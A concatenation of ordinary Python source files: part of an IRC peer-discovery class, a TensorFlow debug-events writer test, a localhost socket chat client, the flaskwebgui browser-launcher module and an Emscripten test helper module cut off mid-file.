self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith(self.irc_prefix):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
debug_events_writer_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the debug events writer Python class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import threading
import time
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import debug_events_writer
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.framework import ops
from tensorflow.python.framework import versions
from tensorflow.python.platform import googletest
class DebugEventsWriterTest(dumping_callback_test_lib.DumpingCallbackTestBase):
def testMultiThreadedConstructorCallWorks(self):
def InitWriter():
debug_events_writer.DebugEventsWriter(self.dump_root)
num_threads = 4
threads = []
for _ in range(num_threads):
thread = threading.Thread(target=InitWriter)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# Verify that there is only one debug event file of each type.
metadata_paths = glob.glob(os.path.join(self.dump_root, "*.metadata"))
self.assertEqual(len(metadata_paths), 1)
source_files_paths = glob.glob(
os.path.join(self.dump_root, "*.source_files"))
self.assertEqual(len(source_files_paths), 1)
stack_frames_paths = glob.glob(
os.path.join(self.dump_root, "*.stack_frames"))
self.assertEqual(len(stack_frames_paths), 1)
graphs_paths = glob.glob(os.path.join(self.dump_root, "*.graphs"))
self.assertEqual(len(graphs_paths), 1)
self._readAndCheckMetadataFile()
def testWriteSourceFilesAndStackFrames(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_protos = 10
for i in range(num_protos):
source_file = debug_event_pb2.SourceFile()
source_file.file_path = "/home/tf2user/main.py"
source_file.host_name = "machine.cluster"
source_file.lines.append("print(%d)" % i)
writer.WriteSourceFile(source_file)
stack_frame = debug_event_pb2.StackFrameWithId()
stack_frame.id = "stack_%d" % i
stack_frame.file_line_col.file_index = i * 10
writer.WriteStackFrameWithId(stack_frame)
writer.FlushNonExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(item.debug_event.source_file
for item in reader.source_files_iterator())
self.assertLen(actuals, num_protos)
for i in range(num_protos):
self.assertEqual(actuals[i].file_path, "/home/tf2user/main.py")
self.assertEqual(actuals[i].host_name, "machine.cluster")
self.assertEqual(actuals[i].lines, ["print(%d)" % i])
actuals = list(item.debug_event.stack_frame_with_id
for item in reader.stack_frames_iterator())
self.assertLen(actuals, num_protos)
for i in range(num_protos):
self.assertEqual(actuals[i].id, "stack_%d" % i)
self.assertEqual(actuals[i].file_line_col.file_index, i * 10)
def testWriteGraphOpCreationAndDebuggedGraphs(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_op_creations = 10
for i in range(num_op_creations):
graph_op_creation = debug_event_pb2.GraphOpCreation()
graph_op_creation.op_type = "Conv2D"
graph_op_creation.op_name = "Conv2D_%d" % i
writer.WriteGraphOpCreation(graph_op_creation)
debugged_graph = debug_event_pb2.DebuggedGraph()
debugged_graph.graph_id = "deadbeaf"
debugged_graph.graph_name = "MyGraph1"
writer.WriteDebuggedGraph(debugged_graph)
writer.FlushNonExecutionFiles()
reader = debug_events_reader.DebugEventsReader(self.dump_root)
actuals = list(item.debug_event for item in reader.graphs_iterator())
self.assertLen(actuals, num_op_creations + 1)
for i in range(num_op_creations):
self.assertEqual(actuals[i].graph_op_creation.op_type, "Conv2D")
self.assertEqual(actuals[i].graph_op_creation.op_name, "Conv2D_%d" % i)
self.assertEqual(actuals[num_op_creations].debugged_graph.graph_id,
"deadbeaf")
def testConcurrentWritesToNonExecutionFilesWorks(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
source_file_state = {"counter": 0, "lock": threading.Lock()}
def WriteSourceFile():
source_file = debug_event_pb2.SourceFile()
with source_file_state["lock"]:
source_file.file_path = "/home/tf2user/file_%d.py" % source_file_state[
"counter"]
source_file_state["counter"] += 1
writer.WriteSourceFile(source_file)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
stack_frame_state = {"counter": 0, "lock": threading.Lock()}
def WriteStackFrame():
stack_frame = debug_event_pb2.StackFrameWithId()
with stack_frame_state["lock"]:
stack_frame.id = "stack_frame_%d" % stack_frame_state["counter"]
stack_frame_state["counter"] += 1
writer.WriteStackFrameWithId(stack_frame)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
graph_op_state = {"counter": 0, "lock": threading.Lock()}
def WriteGraphOpCreation():
graph_op_creation = debug_event_pb2.GraphOpCreation()
with graph_op_state["lock"]:
graph_op_creation.op_name = "Op%d" % graph_op_state["counter"]
graph_op_state["counter"] += 1
writer.WriteGraphOpCreation(graph_op_creation)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
num_threads = 9
threads = []
for i in range(num_threads):
if i % 3 == 0:
target = WriteSourceFile
elif i % 3 == 1:
target = WriteStackFrame
else:
target = WriteGraphOpCreation
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# Verify the content of the .source_files file.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
source_files_iter = reader.source_files_iterator()
actuals = list(item.debug_event.source_file for item in source_files_iter)
file_paths = sorted([actual.file_path for actual in actuals])
self.assertEqual(file_paths, [
"/home/tf2user/file_0.py", "/home/tf2user/file_1.py",
"/home/tf2user/file_2.py"
])
# Verify the content of the .stack_frames file.
actuals = list(item.debug_event.stack_frame_with_id
for item in reader.stack_frames_iterator())
stack_frame_ids = sorted([actual.id for actual in actuals])
self.assertEqual(stack_frame_ids,
["stack_frame_0", "stack_frame_1", "stack_frame_2"])
# Verify the content of the .graphs file.
actuals = list(item.debug_event.graph_op_creation
for item in reader.graphs_iterator())
graph_op_names = sorted([actual.op_name for actual in actuals])
self.assertEqual(graph_op_names, ["Op0", "Op1", "Op2"])
def testWriteAndReadMetadata(self):
t0 = time.time()
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
writer.Close()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
self.assertIsInstance(reader.starting_wall_time(), float)
self.assertGreaterEqual(reader.starting_wall_time(), t0)
self.assertEqual(reader.tensorflow_version(), versions.__version__)
def testWriteExecutionEventsWithCircularBuffer(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
# Before FlushExecutionFiles() is called. No data should have been written
# to the file.
reader.update()
self.assertFalse(reader.executions())
writer.FlushExecutionFiles()
reader.update()
executions = reader.executions()
for i, execution in enumerate(executions):
self.assertEqual(
execution.op_type,
"OpType%d" % (i + debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE))
def testWriteExecutionEventsWithoutCircularBufferBehavior(self):
# A circular buffer size of 0 abolishes the circular buffer behavior.
writer = debug_events_writer.DebugEventsWriter(self.dump_root, 0)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, num_execution_events)
for i, execution in enumerate(executions):
self.assertEqual(execution.op_type, "OpType%d" % i)
def testWriteGraphExecutionTraceEventsWithCircularBuffer(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
trace = debug_event_pb2.GraphExecutionTrace()
trace.op_name = "Op%d" % i
writer.WriteGraphExecutionTrace(trace)
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(reader.graph_execution_traces_iterator())
# Before FlushExecutionFiles() is called. No data should have been written
# to the file.
self.assertEqual(len(actuals), 0)
writer.FlushExecutionFiles()
actuals = list(item.debug_event.graph_execution_trace
for item in reader.graph_execution_traces_iterator())
self.assertLen(actuals, debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE)
for i in range(debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE):
self.assertEqual(
actuals[i].op_name,
"Op%d" % (i + debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE))
def testWriteGraphExecutionTraceEventsWithoutCircularBufferBehavior(self):
# A circular buffer size of 0 abolishes the circular buffer behavior.
writer = debug_events_writer.DebugEventsWriter(self.dump_root, 0)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
trace = debug_event_pb2.GraphExecutionTrace()
trace.op_name = "Op%d" % i
writer.WriteGraphExecutionTrace(trace)
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(item.debug_event.graph_execution_trace
for item in reader.graph_execution_traces_iterator())
self.assertLen(actuals, num_execution_events)
for i in range(num_execution_events):
self.assertEqual(actuals[i].op_name, "Op%d" % i)
def testConcurrentWritesToExecutionFiles(self):
circular_buffer_size = 5
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
debugged_graph = debug_event_pb2.DebuggedGraph(graph_id="graph1",
graph_name="graph1")
writer.WriteDebuggedGraph(debugged_graph)
execution_state = {"counter": 0, "lock": threading.Lock()}
def WriteExecution():
execution = debug_event_pb2.Execution()
with execution_state["lock"]:
execution.op_type = "OpType%d" % execution_state["counter"]
execution_state["counter"] += 1
writer.WriteExecution(execution)
graph_execution_trace_state = {"counter": 0, "lock": threading.Lock()}
def WriteGraphExecutionTrace():
with graph_execution_trace_state["lock"]:
op_name = "Op%d" % graph_execution_trace_state["counter"]
graph_op_creation = debug_event_pb2.GraphOpCreation(
op_type="FooOp", op_name=op_name, graph_id="graph1")
trace = debug_event_pb2.GraphExecutionTrace(
op_name=op_name, tfdbg_context_id="graph1")
graph_execution_trace_state["counter"] += 1
writer.WriteGraphOpCreation(graph_op_creation)
writer.WriteGraphExecutionTrace(trace)
threads = []
for i in range(circular_buffer_size * 4):
if i % 2 == 0:
target = WriteExecution
else:
target = WriteGraphExecutionTrace
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
# Verify the content of the .execution file.
executions = reader.executions()
executed_op_types = [execution.op_type for execution in executions]
self.assertLen(executed_op_types, circular_buffer_size)
self.assertLen(executed_op_types, len(set(executed_op_types)))
# Verify the content of the .graph_execution_traces file.
op_names = [trace.op_name for trace in reader.graph_execution_traces()]
self.assertLen(op_names, circular_buffer_size)
self.assertLen(op_names, len(set(op_names)))
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
__init__.py
|
import json
import sys
import socket
import threading
import time
from select import select
import sys
is_py2 = sys.version[0] == '2'
def main():
"""
Starts socket connection, sending and receiving threads
"""
msg_socket = socket.socket()
args = sys.argv
msg_socket.connect(('127.0.0.1', int(args[1])))
run_event = threading.Event()
receiving = threading.Thread(target = in_thread, args = (msg_socket, run_event))
sending = threading.Thread(target = out_thread, args = (msg_socket, run_event))
receiving.start()
sending.start()
print("threads started")
def in_thread(msg_socket, run_event):
"""
In thread for incoming messages
"""
while (not run_event.is_set()):
in_message = msg_socket.recv(1024).decode('utf-8')
if in_message is not None:
print(in_message)
if len(in_message) == 0:
end_processes(msg_socket, run_event)
time.sleep(0.5)
print("in_thread closed")
def out_thread(msg_socket, run_event):
"""
Out thread for sending messages
"""
while (not run_event.is_set()):
timeout = 10
try:
rlist, _, _ = select([sys.stdin], [], [], timeout)
if rlist:
message = sys.stdin.readline()
if len(message) > 0 and message is not None:
data = {'message': message, 'message_id': 1}
print("sending " + message)
msg_socket.send(json.dumps(data).encode('utf-8'))
else:
continue
except KeyboardInterrupt:
end_processes(msg_socket, run_event)
return True
print("out_thread closed")
def end_processes(msg_socket, run_event):
"""
Shuts down socket connection, end threads
"""
print("shutting down..")
run_event.set()
msg_socket.shutdown(socket.SHUT_RDWR)
print("socket shutted down")
return []
|
flaskwebgui.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
import os, time, signal
import sys, subprocess as sps
import logging
import tempfile
from threading import Thread
from datetime import datetime
temp_dir = tempfile.TemporaryDirectory()
keepalive_file = os.path.join(temp_dir.name, 'bo.txt')
server_log = logging.getLogger('BaseHTTPRequestHandler')
log = logging.getLogger('flaskwebgui')
class S(BaseHTTPRequestHandler):
def log_message(self, format, *args):
'''
Overrides logging in server.py so it doesn't spit out get reauests to stdout.
This allows the caller to filter out what appears on the console.
'''
server_log.debug(f"{self.address_string()} - {format % args}")
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_response()
self.wfile.write("GET request for {}".format(self.path).encode('utf-8'))
with open(keepalive_file, "w") as f:
f.write(f"{datetime.now()}")
class FlaskUI:
"""
This class opens in 3 threads the browser, the flask server, and a thread which closes the server if GUI is not opened
Described Parameters:
app, ==> flask class instance
width=800 ==> default width 800
height=600 ==> default height 600
fullscreen=False, ==> start app in fullscreen mode
maximized=False, ==> start app in maximized window
app_mode=True ==> by default it will start the application in chrome app mode
browser_path="", ==> full path to browser.exe ("C:/browser_folder/chrome.exe")
(needed if you want to start a specific browser)
server="flask" ==> the default backend framework is flask, but you can add a function which starts
the desired server for your choosed framework (django, bottle, web2py pyramid etc)
host="localhost" ==> specify other if needed
port=5000 ==> specify other if needed
socketio ==> specify flask-socketio instance if you are using flask with socketio
on_exit ==> specify on-exit function which will be run before closing the app
"""
def __init__(self, app=None, width=800, height=600, fullscreen=False, maximized=False, app_mode=True, browser_path="", server="flask", host="127.0.0.1", port=5000, socketio=None, on_exit=None):
self.flask_app = app
self.width = str(width)
self.height= str(height)
self.fullscreen = fullscreen
self.maximized = maximized
self.app_mode = app_mode
self.browser_path = browser_path if browser_path else self.get_default_chrome_path()
self.server = server
self.host = host
self.port = port
self.socketio = socketio
self.on_exit = on_exit
self.localhost = "http://{}:{}/".format(host, port) # http://127.0.0.1:5000/
self.flask_thread = Thread(target=self.run_flask) #daemon doesn't work...
self.browser_thread = Thread(target=self.open_browser)
self.close_server_thread = Thread(target=self.close_server)
self.BROWSER_PROCESS = None
def run(self):
"""
Start the flask and gui threads instantiated in the constructor func
"""
self.flask_thread.start()
self.browser_thread.start()
self.close_server_thread.start()
self.browser_thread.join()
self.flask_thread.join()
self.close_server_thread.join()
def run_flask(self):
"""
Run flask or other framework specified
"""
if isinstance(self.server, str):
if self.server.lower() == "flask":
if self.socketio:
self.socketio.run(self.flask_app, host=self.host, port=self.port)
else:
self.flask_app.run(host=self.host, port=self.port)
elif self.server.lower() == "django":
if sys.platform in ['win32', 'win64']:
os.system("python manage.py runserver {}:{}".format(self.host, self.port))
else:
os.system("python3 manage.py runserver {}:{}".format(self.host, self.port))
else:
raise Exception("{} must be a function which starts the webframework server!".format(self.server))
else:
self.server()
def get_default_chrome_path(self):
"""
Credits for get_instance_path, find_chrome_mac, find_chrome_linux, find_chrome_win funcs
got from: https://github.com/ChrisKnott/Eel/blob/master/eel/chrome.py
"""
if sys.platform in ['win32', 'win64']:
return self.find_chrome_win()
elif sys.platform == 'darwin':
return self.find_chrome_mac()
elif sys.platform.startswith('linux'):
return self.find_chrome_linux()
def find_chrome_mac(self):
default_dir = r'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
if os.path.exists(default_dir):
return default_dir
# use mdfind ci to locate Chrome in alternate locations and return the first one
name = 'Google Chrome.app'
alternate_dirs = [x for x in sps.check_output(["mdfind", name]).decode().split('\n') if x.endswith(name)]
if len(alternate_dirs):
return alternate_dirs[0] + '/Contents/MacOS/Google Chrome'
return None
def find_chrome_linux(self):
try:
import whichcraft as wch
except:
raise Exception("whichcraft module is not installed/found \
please fill browser_path parameter or install whichcraft!")
chrome_names = ['chromium-browser',
'chromium',
'google-chrome',
'google-chrome-stable']
for name in chrome_names:
chrome = wch.which(name)
if chrome is not None:
return chrome
return None
def find_chrome_win(self):
import winreg as reg
reg_path = r'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe'
chrome_path = None
for install_type in reg.HKEY_CURRENT_USER, reg.HKEY_LOCAL_MACHINE:
try:
reg_key = reg.OpenKey(install_type, reg_path, 0, reg.KEY_READ)
chrome_path = reg.QueryValue(reg_key, None)
reg_key.Close()
except WindowsError as e:
chrome_path = None
log.exception(e)
else:
if chrome_path and len(chrome_path) > 0:
break
log.debug(f"Chrome path detected as: {chrome_path}")
return chrome_path
def open_browser(self):
"""
Open the browser selected (by default it looks for chrome)
"""
if self.app_mode:
launch_options = None
if self.fullscreen:
launch_options = ["--start-fullscreen"]
elif self.maximized:
launch_options = ["--start-maximized"]
else:
launch_options = ["--window-size={},{}".format(self.width, self.height)]
options = [self.browser_path, "--new-window", '--app={}'.format(self.localhost)]
options.extend(launch_options)
log.debug(f"Opening chrome browser with: {options}")
self.BROWSER_PROCESS = sps.Popen(options,
stdout=sps.PIPE, stderr=sps.PIPE, stdin=sps.PIPE)
else:
import webbrowser
log.debug(f"Opening python web browser")
webbrowser.open_new(self.localhost)
def close_server(self):
"""
If no get request comes from browser on port + 1
then after 10 seconds the server will be closed
"""
httpd = HTTPServer(('', self.port+1), S)
httpd.timeout = 10
while True:
httpd.handle_request()
log.debug("Checking Gui status")
if os.path.isfile(keepalive_file):
with open(keepalive_file, "r") as f:
bo = f.read().splitlines()[0]
diff = datetime.now() - datetime.strptime(bo, "%Y-%m-%d %H:%M:%S.%f")
if diff.total_seconds() > 10:
log.info("Gui was closed.")
break
log.debug("Gui still open.")
time.sleep(2)
if self.on_exit:
self.on_exit()
#Kill current python process
if os.path.isfile(keepalive_file):
#bo.txt is used to save timestamp used to check if browser is open
os.remove(keepalive_file)
try:
import psutil
psutil.Process(os.getpid()).kill()
except:
os.kill(os.getpid(), signal.SIGSTOP)
|
common.py
|
# Copyright 2021 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from enum import Enum
from functools import wraps
from pathlib import Path
from subprocess import PIPE, STDOUT
from urllib.parse import unquote, unquote_plus
from http.server import HTTPServer, SimpleHTTPRequestHandler
import contextlib
import difflib
import hashlib
import logging
import multiprocessing
import os
import shlex
import shutil
import stat
import string
import subprocess
import sys
import tempfile
import time
import webbrowser
import unittest
import clang_native
import jsrun
from tools.shared import TEMP_DIR, EMCC, EMXX, DEBUG, EMCONFIGURE, EMCMAKE
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import get_canonical_temp_dir, try_delete, path_from_root
from tools.utils import MACOS, WINDOWS, read_file, read_binary, write_file, write_binary
from tools import shared, line_endings, building, config
logger = logging.getLogger('common')
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = None
EMTEST_DETECT_TEMPFILE_LEAKS = None
EMTEST_SAVE_DIR = None
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = None
EMTEST_SKIP_SLOW = None
EMTEST_LACKS_NATIVE_CLANG = None
EMTEST_VERBOSE = None
EMTEST_REBASELINE = None
# Special value for passing to assert_returncode which means we expect that program
# to fail with non-zero return code, but we don't care about specifically which one.
NON_ZERO = -1
TEST_ROOT = path_from_root('tests')
WEBIDL_BINDER = shared.bat_suffix(path_from_root('tools/webidl_binder'))
EMBUILDER = shared.bat_suffix(path_from_root('embuilder'))
EMMAKE = shared.bat_suffix(path_from_root('emmake'))
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
def test_file(*path_components):
"""Construct a path relative to the emscripten "tests" directory."""
return str(Path(TEST_ROOT, *path_components))
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
def compiler_for(filename, force_c=False):
if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
return EMXX
else:
return EMCC
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dylink(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
self.check_dylink()
return func(self, *args, **kwargs)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def disabled(note=''):
assert not callable(note)
return unittest.skip(note)
def no_mac(note=''):
assert not callable(note)
if MACOS:
return unittest.skip(note)
return lambda f: f
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def requires_native_clang(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
def require_node(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_node()
return func(self, *args, **kwargs)
return decorated
def require_v8(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_v8()
return func(self, *args, **kwargs)
return decorated
def node_pthreads(f):
def decorated(self, *args, **kwargs):
self.set_setting('USE_PTHREADS')
self.emcc_args += ['-Wno-pthreads-mem-growth']
if self.get_setting('MINIMAL_RUNTIME'):
self.skipTest('node pthreads not yet supported with MINIMAL_RUNTIME')
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
f(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
def ensure_dir(dirname):
dirname = Path(dirname)
dirname.mkdir(parents=True, exist_ok=True)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000, max_line=5000):
lines = string.splitlines()
for i, line in enumerate(lines):
if len(line) > max_line:
lines[i] = line[:max_line] + '[..]'
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines) + '\n'
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_file(name, contents, binary=False):
name = Path(name)
assert not name.is_absolute()
if binary:
name.write_bytes(contents)
else:
name.write_text(contents)
def make_executable(name):
Path(name).chmod(stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = f'{name}_{suffix}'
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the
# function. We add the suffix to it as well.
resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def check_dylink(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dynamic linking with memory growth (without wasm)')
if not self.is_wasm():
self.skipTest('no dynamic linking support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic linking support in ASan yet')
if '-fsanitize=leak' in self.emcc_args:
self.skipTest('no dynamic linking support in LSan yet')
def require_v8(self):
if not config.V8_ENGINE or config.V8_ENGINE not in config.JS_ENGINES:
if 'EMTEST_SKIP_V8' in os.environ:
self.skipTest('test requires v8 and EMTEST_SKIP_V8 is set')
else:
self.fail('d8 required to run this test. Use EMTEST_SKIP_V8 to skip')
self.js_engines = [config.V8_ENGINE]
self.emcc_args.append('-sENVIRONMENT=shell')
def require_node(self):
if not config.NODE_JS or config.NODE_JS not in config.JS_ENGINES:
if 'EMTEST_SKIP_NODE' in os.environ:
self.skipTest('test requires node and EMTEST_SKIP_NODE is set')
else:
self.fail('node required to run this test. Use EMTEST_SKIP_NODE to skip')
self.js_engines = [config.NODE_JS]
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or (self.is_wasm() and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
